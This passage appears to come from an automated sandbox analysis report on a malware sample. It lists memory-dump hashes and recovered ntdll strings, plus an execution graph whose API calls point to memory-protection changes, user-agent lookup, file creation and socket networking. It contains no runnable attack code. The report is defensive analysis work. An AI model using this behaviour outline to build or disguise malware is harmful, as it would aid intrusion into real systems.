                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26175fecab513009fbf9b8f49ecb5ae36f11fa5390ed3988a3bbe6d7e60cb412
                                          • Instruction ID: 8f13783a8da8957b616f71256e78baf83bebe19c506247402866dfe96b8e770b
                                          • Opcode Fuzzy Hash: 26175fecab513009fbf9b8f49ecb5ae36f11fa5390ed3988a3bbe6d7e60cb412
                                          • Instruction Fuzzy Hash: 4290023124140413E2007158950C707000587D0341F55D433A0464558EDA5A89527122
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b2e83c2d8ebb1ac23e5678878164086abcbc79ccfdeeae63635de67a5e55deb
                                          • Instruction ID: 21d5b921469f6c30b1cc3424349405e49d3f07397b6db47623ef9e60888d36d4
                                          • Opcode Fuzzy Hash: 7b2e83c2d8ebb1ac23e5678878164086abcbc79ccfdeeae63635de67a5e55deb
                                          • Instruction Fuzzy Hash: 7490022164540412E2407158941C706001587D0341F55D033A0064554ECA5D8B5676A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96b2bfc1b8e09ef8389bb659f5023ba8967bc647d508cbef860c6c0830830377
                                          • Instruction ID: fcf9b212da93393d667475b80f528070d9213ebd8fab64c22620b6405d0dfcfd
                                          • Opcode Fuzzy Hash: 96b2bfc1b8e09ef8389bb659f5023ba8967bc647d508cbef860c6c0830830377
                                          • Instruction Fuzzy Hash: DB90023124140852E20071588408B46000587E0341F55C037A0164654E8A19C9527522
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92d31b1d2c831f17d362be54496a33b5362b20ca0c648b7a601ce2fcfc056af4
                                          • Instruction ID: a2b350cd44715d2058a9f05543f675bb60d4c371067b0c45fb2010f038c5f367
                                          • Opcode Fuzzy Hash: 92d31b1d2c831f17d362be54496a33b5362b20ca0c648b7a601ce2fcfc056af4
                                          • Instruction Fuzzy Hash: 5B90023128140412E24171588408606000997D0381F95C033A0464554F8A598B57BA62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 331de63ae2461213d10a5560acd123dcc4d302753ffac44576065f242841abed
                                          • Instruction ID: 01fd423267e34f5a297ae58378da0b5f909032c7afb816449ed443f6386d795f
                                          • Opcode Fuzzy Hash: 331de63ae2461213d10a5560acd123dcc4d302753ffac44576065f242841abed
                                          • Instruction Fuzzy Hash: A090022124544452E2007558940CA06000587D0345F55D033A10A4595ECA398952B132
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47c339e0de10d0e60e2de0b6783a5515a1ee9f7ef6587aed509f12e7bf7733e4
                                          • Instruction ID: 1bf5229f39239456312e406cf28b9408c5ddfedc7807429f45505d911170b298
                                          • Opcode Fuzzy Hash: 47c339e0de10d0e60e2de0b6783a5515a1ee9f7ef6587aed509f12e7bf7733e4
                                          • Instruction Fuzzy Hash: 4590026124180413E24075588808607000587D0342F55C033A20A4555F8E2D8D527136
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5cb8a7f8e6d753cc264cd7d695b1209e42bb7a630e540f9cc3bc3bc2bf96a96d
                                          • Instruction ID: c3c81de86e0cc385ab29a41bde3757cde9e5b5e44f53338a7bf600c8828452ed
                                          • Opcode Fuzzy Hash: 5cb8a7f8e6d753cc264cd7d695b1209e42bb7a630e540f9cc3bc3bc2bf96a96d
                                          • Instruction Fuzzy Hash: 6890022134140412E202715884186060009C7D1385F95C033E1464555E8A298A53B133
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5eb1ea770815a882f2d72d26104e2f9a43f1f030300adc951579468c3397955e
                                          • Instruction ID: 30d9d4efbeb0acf14a54389c7034f500f2e5f3bbbcd265b0ec280498a04e6a2d
                                          • Opcode Fuzzy Hash: 5eb1ea770815a882f2d72d26104e2f9a43f1f030300adc951579468c3397955e
                                          • Instruction Fuzzy Hash: 0990023124180412E2007158880C747000587D0342F55C033A51A4555F8A69C9927532
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97e88e3f0c5c48220637b522f387da862b1774fc4bb25b197785750054d42950
                                          • Instruction ID: a08df123ae3059e0e18790c038575a50126d3c9e2a3dfc3d8c158bb71f4d9488
                                          • Opcode Fuzzy Hash: 97e88e3f0c5c48220637b522f387da862b1774fc4bb25b197785750054d42950
                                          • Instruction Fuzzy Hash: FC90026125140052E20471588408706004587E1341F55C033A2194554DC92D8D626126
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b316bca1a2a63a46db25520466c537a49faf8dfac76e9d669db17f604e1c32f
                                          • Instruction ID: 9fcc10ba89276e25c088f282d07b44a6a1b3cff10108c166bc4caf59bb9745ee
                                          • Opcode Fuzzy Hash: 0b316bca1a2a63a46db25520466c537a49faf8dfac76e9d669db17f604e1c32f
                                          • Instruction Fuzzy Hash: 7D90022128140812E2407158C4187070006C7D0741F55C033A0064554E8A1A8A6676B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb9fc560d35a6b2e8cf99ec1cc33b392a20939164b104963b68e280fb1ad9c60
                                          • Instruction ID: d2aed7ce460c90b247cf0f8c407b3f53c40a26b297c4722126d2794dc6c319b7
                                          • Opcode Fuzzy Hash: bb9fc560d35a6b2e8cf99ec1cc33b392a20939164b104963b68e280fb1ad9c60
                                          • Instruction Fuzzy Hash: 3390022124184452E24072588808B0F410587E1342F95C03BA4196554DCD1989566722
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8a4512265b8825241af12efdcadc6b47946802379c636cc0b1b217738924554
                                          • Instruction ID: d5086a026b55aae2355a1e5851894e7c8f7559757dd27543dcb075c04a85b7da
                                          • Opcode Fuzzy Hash: f8a4512265b8825241af12efdcadc6b47946802379c636cc0b1b217738924554
                                          • Instruction Fuzzy Hash: 9B90023164550412E20071588518706100587D0341F65C433A0464568E8B998A5275A3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f0de20a1a7059b03f5fc3f7eb9b88457fcd1aae82040c42d60a145837d15e87e
                                          • Instruction ID: 50431f4d50565d1b7234b2f3b707f5317573c9f1af4f2b553ae4f57c7f6904c4
                                          • Opcode Fuzzy Hash: f0de20a1a7059b03f5fc3f7eb9b88457fcd1aae82040c42d60a145837d15e87e
                                          • Instruction Fuzzy Hash: C790022128545112E250715C84086164005A7E0341F55C033A0854594E895989567222
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f93fa5fb0d1999aa968135645f5e3accb5a6eef6118b213315ac4f8fb3f20f9
                                          • Instruction ID: e4027bafcaace1454af109b49397dd329fd547fa816fa18627a96bb1fb40d3c2
                                          • Opcode Fuzzy Hash: 0f93fa5fb0d1999aa968135645f5e3accb5a6eef6118b213315ac4f8fb3f20f9
                                          • Instruction Fuzzy Hash: DC90023524140412E61071589808646004687D0341F55D433A0464558E8A5889A2B122
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7302f4fb52d8a1ad4b0e6c08d521830219a6e7299bb3d7741f9c4c47715aa24e
                                          • Instruction ID: 3fdbc643f0eedef3e7faab81d2210ef65b0487ae50a75f387746191e971819be
                                          • Opcode Fuzzy Hash: 7302f4fb52d8a1ad4b0e6c08d521830219a6e7299bb3d7741f9c4c47715aa24e
                                          • Instruction Fuzzy Hash: 7490023124240152A64072589808A4E410587E1342B95D437A0055554DCD1889626222
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: f1714d48c5e40295d540e066429b6ff65e6101ec3c81c223ddb811f5147d110e
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: c57901306be0d625a8a130ff4181c3f4b52d1143c713167d9d943af03313d0df
                                          • Instruction ID: 81bebf6ef29a0f4cf2a2c436c8be77ca560d6289a796537f859d15af3c550259
                                          • Opcode Fuzzy Hash: c57901306be0d625a8a130ff4181c3f4b52d1143c713167d9d943af03313d0df
                                          • Instruction Fuzzy Hash: 2651E7B2E00516AFDF50DBA88C90A7EF7B8BB58310B14C12AE459D7641D634DE40BBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 15d97260a948660afc474210bc32f73380b047f484ebaf2fbf277845f9e56591
                                          • Instruction ID: 2e7f5d32f56505684022d5e108fe5577e25b1b34ad24ae8a3c31d5a648ba510f
                                          • Opcode Fuzzy Hash: 15d97260a948660afc474210bc32f73380b047f484ebaf2fbf277845f9e56591
                                          • Instruction Fuzzy Hash: D8511671A00645AECB60DF5CCC80A7EB7FAAF64310B1C845BE495C3782DA74DE40A7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Execute=1, xrefs: 00F94713
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00F94655
                                          • ExecuteOptions, xrefs: 00F946A0
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00F94725
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 00F94787
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00F94742
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00F946FC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: b762e84bc5a300b66f2cb7e82231db67e657915e4d13df3d1f04cf9fea28bf05
                                          • Instruction ID: 0491db3255397016f4ccdef324e23dba5b557d28db69ac55175553b76fb2fb38
                                          • Opcode Fuzzy Hash: b762e84bc5a300b66f2cb7e82231db67e657915e4d13df3d1f04cf9fea28bf05
                                          • Instruction Fuzzy Hash: AE512D31A043196AEF10BBA4FC86FE977A8AF18311F1400A9EA05A71C1D775AE49BF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction ID: 3b3950bb6e568398171a57d572470bb58cb6c7b794ab98b38c3198ac8a840a49
                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction Fuzzy Hash: F881C170E0524A9EDF249E68C8917FEBBB5AF85320F184259E851E7291C7359CC1EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • RTL: Re-Waiting, xrefs: 00F9031E
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00F902E7
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00F902BD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          • Opcode ID: 01ab59d69c53bec6e22b6a921e2c0218595fd2e60df4b3a4c2eb388796c9a3de
                                          • Instruction ID: 42a4091948ba7089082b7e9b163aeeb8b18669746db8d009e72175e37132ffec
                                          • Opcode Fuzzy Hash: 01ab59d69c53bec6e22b6a921e2c0218595fd2e60df4b3a4c2eb388796c9a3de
                                          • Instruction Fuzzy Hash: 8FE1B331A047419FD725CF28C885B1ABBE0BF45324F244A2DF9998B2D1DB78D949EB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • RTL: Re-Waiting, xrefs: 00F97BAC
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00F97B7F
                                          • RTL: Resource at %p, xrefs: 00F97B8E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 0-871070163
                                          • Opcode ID: 6a0b1fb61a276b84c38c2a25ddf6c90f6a7d74224ce1e94e296bd0d66a7cca62
                                          • Instruction ID: 2d306273b1f49ca0f96d694abf1fa9e98cdb7b2edb10414ac88dcb9087cfbe06
                                          • Opcode Fuzzy Hash: 6a0b1fb61a276b84c38c2a25ddf6c90f6a7d74224ce1e94e296bd0d66a7cca62
                                          • Instruction Fuzzy Hash: 774127317047029FDB20DE65CC41B6AB7E5EF85721F100A2DF95ADB280DB30E809AB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F9728C
                                          Strings
                                          • RTL: Re-Waiting, xrefs: 00F972C1
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00F97294
                                          • RTL: Resource at %p, xrefs: 00F972A3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: 5b2fde1c5899349603a3b21bfeeae6431efe8bf44928f866f3b252b1619b4723
                                          • Instruction ID: c918b7cc3f6dffc5a0eb2f5c05d6a01411f5de8e6759e22dc7e2321b3c02ba5e
                                          • Opcode Fuzzy Hash: 5b2fde1c5899349603a3b21bfeeae6431efe8bf44928f866f3b252b1619b4723
                                          • Instruction Fuzzy Hash: E3412532B14302ABDB20DF65CC42B66B7A1FF84721F100619FD55DB281DB31E806ABD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 52c9acbb555a1a067e3fc4e4141279d84b7192aa0c24d8c0344a53f0676a620b
                                          • Instruction ID: 7bb405d73f556021b6cb83042be42a7ad70e4df0d78f1cc1836ecd8d9fc7b0b7
                                          • Opcode Fuzzy Hash: 52c9acbb555a1a067e3fc4e4141279d84b7192aa0c24d8c0344a53f0676a620b
                                          • Instruction Fuzzy Hash: D031B472A002189FCB60DF28CC40BEEB7B9EF14710F484556E849E3240EB35EE44AFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-
                                          • API String ID: 1302938615-2137968064
                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction ID: b510502c755a9a215e26db1f1916f80f2b2ec516b885d338777591198058776a
                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction Fuzzy Hash: 9391C671E083069BDF24EF69C881ABEB7B1EF54734F24461AE855E72C0DB348D41A790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: 3b89fcc3d66ea7b1960c5266f7b3df8ea3150e19672ed8d8b839297fe21c2ea2
                                          • Instruction ID: ee34a520599a1ab30bf4bc6012327a00c0c2c8f0dae9b7a44fd4e5d4a0b87136
                                          • Opcode Fuzzy Hash: 3b89fcc3d66ea7b1960c5266f7b3df8ea3150e19672ed8d8b839297fe21c2ea2
                                          • Instruction Fuzzy Hash: D3811B72D002799BDB31DB54CC45BEEB7B4AF08750F0441EAA919B7280E7759E84DFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:2.3%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:4.7%
                                          Total number of Nodes:444
                                          Total number of Limit Nodes:15
                                          execution_graph 13802 e7462f4 13803 e746349 13802->13803 13804 e74649f 13803->13804 13806 e7428f2 NtProtectVirtualMemory 13803->13806 13805 e7428f2 NtProtectVirtualMemory 13804->13805 13809 e7464c3 13804->13809 13805->13809 13807 e746480 13806->13807 13808 e7428f2 NtProtectVirtualMemory 13807->13808 13808->13804 13810 e7428f2 NtProtectVirtualMemory 13809->13810 13811 e746597 13809->13811 13810->13811 13812 e7428f2 NtProtectVirtualMemory 13811->13812 13813 e7465bf 13811->13813 13812->13813 13816 e7428f2 NtProtectVirtualMemory 13813->13816 13817 e7466b9 13813->13817 13814 e7466e1 13815 e749382 ObtainUserAgentString 13814->13815 13818 e7466e9 13815->13818 13816->13817 13817->13814 13819 e7428f2 NtProtectVirtualMemory 13817->13819 13819->13814 13820 e7420f1 13821 e7421d3 13820->13821 13822 e742109 13820->13822 13823 e742012 6 API calls 13822->13823 13824 e742113 13823->13824 13824->13821 13825 e74df82 6 API calls 13824->13825 13825->13821 13933 e7435f1 13934 e743606 13933->13934 13935 e74360e 13933->13935 13936 e748662 6 API calls 13934->13936 13936->13935 13937 e74f9f1 13938 e74f9f7 13937->13938 13941 e744852 13938->13941 13940 e74fa0f 13942 e7448e4 13941->13942 13943 e744865 13941->13943 13942->13940 13943->13942 13945 e744887 13943->13945 13947 e74487e 13943->13947 13944 e74a36f 13944->13940 13945->13942 13946 e748662 6 API calls 13945->13946 13946->13942 13947->13944 13948 e74a0c2 6 API calls 13947->13948 13948->13944 13484 e74d232 13485 e74d25c 13484->13485 13487 e74d334 13484->13487 13486 e74d410 NtCreateFile 13485->13486 13485->13487 13486->13487 13953 e74f9b3 13954 e74f9bd 13953->13954 13957 e7446d2 13954->13957 13956 e74f9e0 13958 e7446f7 13957->13958 13959 e744704 13957->13959 13960 e7420f2 6 API calls 13958->13960 13961 e7446ff 13959->13961 13962 e74472d 13959->13962 13964 e744737 13959->13964 13960->13961 13961->13956 13966 e74a2c2 13962->13966 13964->13961 13965 e74df82 6 API calls 13964->13965 13965->13961 13967 e74a2df 13966->13967 13968 e74a2cb 13966->13968 13967->13961 13968->13967 13969 e74a0c2 6 API calls 13968->13969 13969->13967 13878 e7488be 13879 e7488c3 13878->13879 13880 e7489a6 13879->13880 13881 e748995 ObtainUserAgentString 13879->13881 13881->13880 13970 e745fbf 13973 e746016 13970->13973 13971 e7460f0 13972 e7460e8 13974 e749382 ObtainUserAgentString 13972->13974 13973->13971 13975 e7428f2 NtProtectVirtualMemory 13973->13975 13976 e7460bb 13973->13976 13974->13971 13975->13976 13976->13972 13977 e7428f2 NtProtectVirtualMemory 13976->13977 13977->13972 13882 e74a0b9 13883 e74a0ed 13882->13883 13885 e74a1f0 13882->13885 13884 e74df82 6 API calls 13883->13884 13883->13885 13884->13885 13766 e74c83a 13767 e74c841 13766->13767 13768 e74df82 6 API calls 13767->13768 13770 e74c8c5 13768->13770 13769 e74c906 13770->13769 13771 e74d232 NtCreateFile 13770->13771 13771->13769 13898 e74df7a 13899 e74dfb8 13898->13899 13900 e74a5b2 socket 13899->13900 13901 e74e081 13899->13901 13909 e74e022 13899->13909 13900->13901 13902 e74e134 13901->13902 13904 e74e117 getaddrinfo 13901->13904 13901->13909 13903 e74a732 connect 13902->13903 13907 e74e1b2 13902->13907 13902->13909 13903->13907 13904->13902 13905 e74a6b2 send 13908 e74e729 13905->13908 13906 e74e7f4 setsockopt recv 13906->13909 13907->13905 13907->13909 13908->13906 13908->13909 13826 e7460fb 13828 e746137 13826->13828 13827 e7462d5 13828->13827 13829 e7428f2 NtProtectVirtualMemory 13828->13829 13830 e74628a 13829->13830 13831 e7428f2 NtProtectVirtualMemory 13830->13831 13834 e7462a9 13831->13834 13832 e7462cd 13833 e749382 ObtainUserAgentString 13832->13833 13833->13827 13834->13832 13835 e7428f2 NtProtectVirtualMemory 13834->13835 13835->13832 13836 e74a2e4 13837 e74a36f 13836->13837 13838 e74a305 13836->13838 13838->13837 13840 e74a0c2 13838->13840 13841 e74a0cb 13840->13841 13843 e74a1f0 13840->13843 13842 e74df82 6 API calls 13841->13842 13841->13843 13842->13843 13843->13837 13910 e744b66 13911 e744b6a 13910->13911 13912 e744cb5 CreateMutexW 13911->13912 13913 e744cce 13911->13913 13912->13913 13844 